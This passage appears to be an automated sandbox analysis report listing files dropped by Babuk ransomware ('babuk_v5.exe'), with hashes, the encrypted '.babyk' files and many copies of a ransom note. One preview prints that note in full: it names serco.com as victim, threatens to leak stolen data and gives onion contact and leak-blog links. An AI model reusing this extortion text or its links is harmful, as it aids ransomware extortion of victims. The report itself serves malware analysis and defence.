                                                                            Encrypted:false
                                                                            SSDEEP:12:+/qY5Oea/uwuOea/uwuOealeaHupa/u+a/uBePYuBeua/uvAuxuWu2uWu2uWuou4:cqa
                                                                            MD5:CB75C0AD5D4EDBDC7750ACFA22E0BB29
                                                                            SHA1:FB36284185BD063AEDB64DBD6F3A485CF70A109F
                                                                            SHA-256:878A1ED83FCFC18F0C0EA736BB2E5B890EFD7F744359FFDBF88E2CE4EB3FB83C
                                                                            SHA-512:D44B53886E954F70EC58C8D0940D4C8CDD94E9EA2F1DED5DD6C92F9B0105C4B25D59F44E19A2E4AEB93815D50D5473EEC40B71EC67902AB2A3F1E987E9BA83DF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Examples
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.0968908207697585
                                                                            Encrypted:false
                                                                            SSDEEP:48:51Fxh6f0zBXUJg9qvxgnkYHqCRak4ibYzn:3LhY01XUDeQRcYj
                                                                            MD5:A3093C6392BC66946591CCC28C8FB5ED
                                                                            SHA1:DA9ABF5443086860B9847AD243F2420AD5AD025D
                                                                            SHA-256:87E197AA72AF5858F40FCFE10EDB8D22C367221858F356F954D25FC4E0C33FFB
                                                                            SHA-512:3DE0013D142B84B952E1A7A50AA10C125F241BF978D645CAE222EEBEC0BB6ABB0792664AA07A88FEBDF2B18355A579806961AA584AF26F2185AB2A13FFF99BBC
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_SciTE_SciTE_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):6.157442191616183
                                                                            Encrypted:false
                                                                            SSDEEP:96:3k7J5Wr/egnoN0NgCIxphY/+mV47GYLPX/TL+A:3k7y/oN08xXyVA5/7
                                                                            MD5:6E56FD21751B46571AAB9DE0B6E6A060
                                                                            SHA1:F38E64420C4CBA2956F4D8FFAB6E864F9B50CF0F
                                                                            SHA-256:C92B21BD526E8DB04A1FFBB9A89AC1561232400059AF880D1017FEBC4897DDB1
                                                                            SHA-512:F169FEDB19D4468D8EFE8D565562707683ACC38E794DF4E1CF54CD4E2847DF051F3285A3D24F6EB18EFD44215E4D9900D4DE519CA96E5DB0C65AC4FBD8CDCD42
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_MSACCESS_EXE
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.022256232591177
                                                                            Encrypted:false
                                                                            SSDEEP:96:XGfevXfevXf58KvXfgvXf9vXfuvDU9v5d8888S2vLGvWivduvh9vzd8888S2vOGe:XGfevXfevXf58KvXfgvXf9vXfuvY9v5M
                                                                            MD5:8829AEB1031D3D9A713E4CF8BC3A1504
                                                                            SHA1:FFC77D0744FDA55C02161CDD9387DC19CD9E1FCB
                                                                            SHA-256:CBE171937436CEAEFB0A39A1E1F64AD40DC676B94BEFF8014247E84CD352C3B4
                                                                            SHA-512:3BCC0D68F9683A9D1CC1503128A239ACB96A62C68DFB64A01186D98DB96CE0AEAC10AF6620E5433FB0B392A077C495A7C4B9339120F02993B4E1C99FE1961999
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_MSPUB_EXE
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.5526609980030193
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqPhwXderururHr98r9Frrr989OVJ9e9QCHhXWFRaKG9Ir9Ir8rmrgrazrRA26rq:eXUqqLh8hFnhAgy3HhyR/qIhIoyEkdU
                                                                            MD5:CBC17E9089C38894379216144A17A426
                                                                            SHA1:05A6653D0ADA2C6F174C4F36F8DA88EF713781F5
                                                                            SHA-256:E0FB86515AEAA6BE86C2F5D706EBB2EB48358D8D29DA039ADBD7B4F0181C93D8
                                                                            SHA-512:DABE0C3F9AAAC78F82870E88C3D04CB8DB5A993E58128C17F3C407BC05A8BE4981A8A74A036C055129062125D4A5222EF2ED47BFDA82C5F1B3F7AD3C8FECE223
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_ONENOTE_EXE
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.6510423273820805
                                                                            Encrypted:false
                                                                            SSDEEP:48:EBcFAcVSDDDDDDDzV3MVyWVyZVSDDDDdZVyZuZEDDDDdNn6TW8DDDDdZcZ1ZGDD2:gKA7Q
                                                                            MD5:0B46DF459CA2118151F3A1CDBE8A1E10
                                                                            SHA1:8886810E9BF3270EA9534D1D38EB8DF822B0E184
                                                                            SHA-256:1A9406047CA62F61BFF29B239E215379E2B7CEBB65960B194FCEDF064469CFA6
                                                                            SHA-512:122F32E69FED3CD537B9AB184711799486090303ED994C4FD7EA73C5057C2974CF6A743FDAD55852D951E523AB6CC40DDA215C7D75BAD1BC176FB67D112CAF99
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_OcPubMgr_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.4853575089640523
                                                                            Encrypted:false
                                                                            SSDEEP:48:7sB1UnRXFhYCRrK98lgzBh/qQKb/ttYZA1VlFBq+yw4J:eURXFn41MbrB1VXIw+
                                                                            MD5:2C177A8E3D2290969576F10F229C237C
                                                                            SHA1:3E42D3728EF193BBA05F20ACD2C9A9EAACBA55BB
                                                                            SHA-256:DFAA0C946813D8615F2FFB8E97BA7B10450EA2566ED929BE73AFE85EE047B588
                                                                            SHA-512:1177B06547A2403052FCEC4CEDB65707B2956A0D16AA30CB1FB538D7E6CD4A283E21BEA6AFECFBEFFECF68630A3CD940536EAE90A8F1C664DF2CE262F1E78ADA
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Microsoft Office_Office16_msoev_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.0658774540515137
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqTrqaCCCCCC4quSVuHzSyCCCCxd6TCCCC2NxJCCCCmqBhCCCCCCCTCCCCCCCCC3:Prq35SVMzS466NWIbeJ+OWv
                                                                            MD5:4AC54A076B85B661EAE9A3B14305A72E
                                                                            SHA1:7504D2386989E002410714187077E73B28B031AD
                                                                            SHA-256:C56F25E6742DFF819E53CE3F1354A6C20520B312E15C59E46A595A87B96758D2
                                                                            SHA-512:E571C4C47DAA8417384960AEE567D3BDD9A404A4E77371E11FC49BB6BA32DF466096E46D70B3D89E48B9B112B0CA3FA4B703A614B26B10C1D98E0E7CEC43B4B8
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\CortanaTrace1.etl
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.12764594958611664
                                                                            Encrypted:false
                                                                            SSDEEP:12:BFEzXZ/Ey6q9995n6LlXY6iK8tOQ1UMCl2rjoD7CePglyDQqTEH:fOl68d6LlXY6iKUPSMClCjoHCeIlyjT8
                                                                            MD5:7D346BE1445CDFE0A3C3C462C54E1594
                                                                            SHA1:BF14569FBE8E607376BA800F25C2529D73909466
                                                                            SHA-256:8CFF72F9657F9B8BE5893F1B333F2519DF9F87FBA323CA1C618BA348E589848C
                                                                            SHA-512:7477FA5AFB25CE7CD1F6173A50D9E26F8981A6026B1A8548DE02B5F47E600CB5FDCD98A576E04C362F520ECCD103E282BBE6E381F2293DE0523A5AA20A08E067
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\~ortanaUnifiedTileModelCache.tmp
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):133350
                                                                            Entropy (8bit):4.0262497494807326
                                                                            Encrypted:false
                                                                            SSDEEP:3072:u7tpBXu5XNFs9B/hV4aMpI7tpqXu5XNFs9B/hV4aMpH:uh65XNyMpIhL5XNyMpH
                                                                            MD5:87109392F282F8B109A438340607DFC6
                                                                            SHA1:4B9798532AE75EE631C90FF4E0E33BBDEF965F36
                                                                            SHA-256:5C69ED5D98A9F573916CA6C92B2CE3BC312DA369B94BC89FDE79192DDD90B379
                                                                            SHA-512:49F8B7F979C9ED2CC8007EF0EA474049F3BBFA9C4E22A953D4136DF6046F9C85570F5730EC427E00BD43A11170B1427C89E23732F165645BD1561B7150E5A11D
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.551244655242181
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlXMYcc8xpAWDtJHfW5L+nh+iq6HMUbxCvJjBUAfeV0fImXaLUxNvEEn:HM5Ym3/W5L++MCvFjGV0fYL0vtn
                                                                            MD5:A9A24F79176A57DF23063A918A292C17
                                                                            SHA1:BC023818C089A65F52AC9D51C69749FE47CC32A6
                                                                            SHA-256:DCE0EF993323E1BBC7C1A57220FF14D2724D81192BE1D472BD4A3BB68E7FB58E
                                                                            SHA-512:D7AF6B7C312C572863EFFC465321974547871E84BE170A4CCDF0EF7CD01DD740D139B6B1F722EC352C200F39745E655CAB5D2FC0A4985A58C279E0321F3F9CC4
                                                                            Malicious:false
                                                                            Preview: ..........s.{.P.2......z/t.@C....c..sn.'...."E.p...k..s...z.H.r...-.[.E;$.....S ~Y.].ME..'.9D..v...qeI.s.........-.4kQ....]m......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
